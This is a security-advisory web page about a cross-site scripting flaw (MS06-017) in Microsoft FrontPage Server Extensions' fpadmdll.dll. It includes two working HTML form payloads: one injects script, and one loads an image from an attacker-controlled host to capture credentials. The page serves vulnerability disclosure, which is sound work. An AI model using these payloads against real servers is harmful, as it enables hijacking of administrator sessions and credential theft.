|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 704 CVE : CVE-2006-0015 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : Yes Exploit Given : Yes Credit : Esteban Martinez Fayo (secemf yahoo com ar) Published : 13.04.2006
Advisory Text : Argeniss Security Advisory Name: Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting (MS06-17) Affected Software: Microsoft FrontPage Server Extensions 2002 and Microsoft SharePoint Team Services Severity: Medium Remote exploitable: Yes (User intervention required) Credits: Esteban Martínez Fayó Date: 4/11/2006 Advisory Number: ARG040602 Details: The FrontPage Server Extensions 2002 (included in Windows Sever 2003 IIS 6.0 and available as a separate download for Windows 2000 and XP) has a web page /_vti_bin/_vti_adm/fpadmdll.dll that is used for administrative purposes. This web page is vulnerable to cross site scripting attacks allowing an attacker to run client-side script on behalf of an FPSE user. If the victim is an administrator, the attacker could take complete control of a Front Page Server Extensions 2002 server. To exploit the vulnerability an attacker can send a specially crafted message to a FPSE user and then persuade the user to click a link in the e-mail message. In addition, this vulnerability can be exploited if an attacker hosts a malicious website and persuade the user to visit it. The vulnerable parameters of fpadmdll.dll are "operation", "command", and "name". These parameters appears in the output without properly sanitization in an HTML comment but it can be escaped with a '-->'. Exploit Examples: An attacker could create a FORM that POST to the FPSE server and executes a script on the client system. <form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST"> <input type="hidden" name="operation" value="--><script>alert()</script>"> <input type="hidden" name="action" value="none"> <input type="hidden" name="port" value="/LM/W3SVC/1:"> <input type="submit" name="page" value="healthrp.htm"> </form> Also, an attacker could inject an image from another web site that he has control over and if it has HTTP authentication could convince the user to enter its credentials and capture it. <form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST"> <input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>"> <input type="hidden" name="action" value="none"> <input type="hidden" name="port" value="/LM/W3SVC/1:"> <input type="submit" name="page" value="healthrp.htm"> </form> Vendor Status: Vendor was contacted and a patch was released. Patch Available: Apply patch MS06-017. Links: http://www.argeniss.com/research/ARGENISS-ADV-040602.txt http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx Spam: Argeniss Ultimate 0day Exploits Pack http://www.argeniss.com/products.html Argeniss - Information Security *Application Security Experts* http://www.argeniss.com __________________________________________________ Correo Yahoo! Espacio para todos tus mensajes, antivirus y antispam ?gratis! ?Abrí tu cuenta ya! - http://correo.yahoo.com.ar Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |